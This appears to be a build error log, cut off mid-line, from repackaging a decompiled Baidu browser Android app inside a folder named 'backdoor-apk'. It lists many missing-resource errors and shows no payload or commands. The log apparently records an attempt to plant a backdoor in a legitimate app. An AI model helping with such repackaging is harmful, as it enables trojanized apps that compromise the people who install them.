/root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dl.xml:4: error: Error: No resource found that matches the given name (at 'style' with value '@style/pull_to_refresh_pb'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/do.xml:5: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/do.xml:12: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/do.xml:18: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/do.xml:5: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/do.xml:12: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/do.xml:18: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dp.xml:8: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dp.xml:21: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dp.xml:34: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dp.xml:47: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dp.xml:61: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dp.xml:67: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/lottery_horizontal_line'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/dp.xml:8: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/dp.xml:21: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/dp.xml:34: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/dp.xml:47: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/dp.xml:61: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/dp.xml:67: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/lottery_horizontal_line'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ds.xml:16: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ds.xml:16: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ds.xml:16: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ds.xml:16: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/du.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/lottery_current_issue_prize'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/du.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/lottery_before_results'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/du.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/lottery_current_issue_prize'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/du.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/lottery_before_results'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dz.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/match_detail_header_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/dz.xml:11: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/match_detail_title_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/e.xml:4: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/football_title_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/e3.xml:13: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/e3.xml:13: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/e3.xml:15: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/e3.xml:15: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/e3.xml:24: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/e3.xml:24: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/e3.xml:13: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/e3.xml:13: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/e3.xml:15: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/e3.xml:15: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/e3.xml:24: error: No resource identifier found for attribute 'colNum' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/e3.xml:24: error: No resource identifier found for attribute 'rowHeight' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/e5.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/pull_to_refresh_listview_empty_page'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/e9.xml:10: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/e9.xml:10: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/e9.xml:10: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/e9.xml:10: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/e9.xml:10: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/e9.xml:10: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eb.xml:10: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eb.xml:10: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/eb.xml:10: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v16/eb.xml:10: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eb.xml:10: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eb.xml:10: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ed.xml:2: error: No resource identifier found for attribute 'center' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ef.xml:4: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/website_list_view_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ef.xml:4: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/website_list_view_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:9: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:9: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:10: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:41: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:55: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:58: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:59: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:60: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:61: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:8: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:21: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:28: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:35: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:44: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:46: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:48: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:64: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:66: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eq.xml:67: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:9: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:9: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:10: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:41: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:55: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:58: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:59: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:60: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:61: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:8: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:21: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:28: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:35: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:44: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:46: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:48: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/middle_screen_text_with_hot_icon'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:64: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:66: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eq.xml:67: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/er.xml:9: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/er.xml:11: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/er.xml:11: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/er.xml:15: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/er.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/er.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/er.xml:34: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/er.xml:35: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/er.xml:37: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/er.xml:9: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/er.xml:11: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/er.xml:11: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/er.xml:15: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/er.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_title'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/er.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/er.xml:34: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_no_content'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/er.xml:35: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/home_content_splitline_horizontal'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/er.xml:37: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/right_screen_item_more'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/et.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/pull_to_refresh_listview_empty_page'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/et.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/pull_to_refresh_listview_empty_page'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:4: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:4: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:7: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:7: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:13: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:13: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:13: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:17: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:17: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:17: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:22: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:22: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:22: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:26: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:26: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:26: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:30: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:30: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/eu.xml:30: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:4: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:4: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:7: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:7: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:13: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:13: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:13: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:17: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:17: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:17: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:22: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:22: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:22: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:26: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:26: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:26: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:30: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:30: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/eu.xml:30: error: No resource identifier found for attribute 'filterColor' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ev.xml:4: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ev.xml:4: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ev.xml:4: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ev.xml:4: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f.xml:4: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/meme_title_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f1.xml:19: error: No resource identifier found for attribute 'checkMark' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f1.xml:19: error: No resource identifier found for attribute 'checkMark' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f2.xml:4: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f2.xml:4: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f2.xml:5: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_title_txt'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f2.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/news_list_item_common_bottom'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f2.xml:4: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f2.xml:4: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f2.xml:5: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_title_txt'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f2.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/news_list_item_common_bottom'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f3.xml:5: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f3.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f3.xml:10: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f3.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f3.xml:5: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f3.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f3.xml:10: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f3.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/news_list_item_other_msg'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f4.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/news_list_item_common_bottom'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/f4.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/news_list_item_common_bottom'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f5.xml:6: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f5.xml:6: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/f5.xml:13: error: Error: No resource found that matches the given name (at 'style' with value 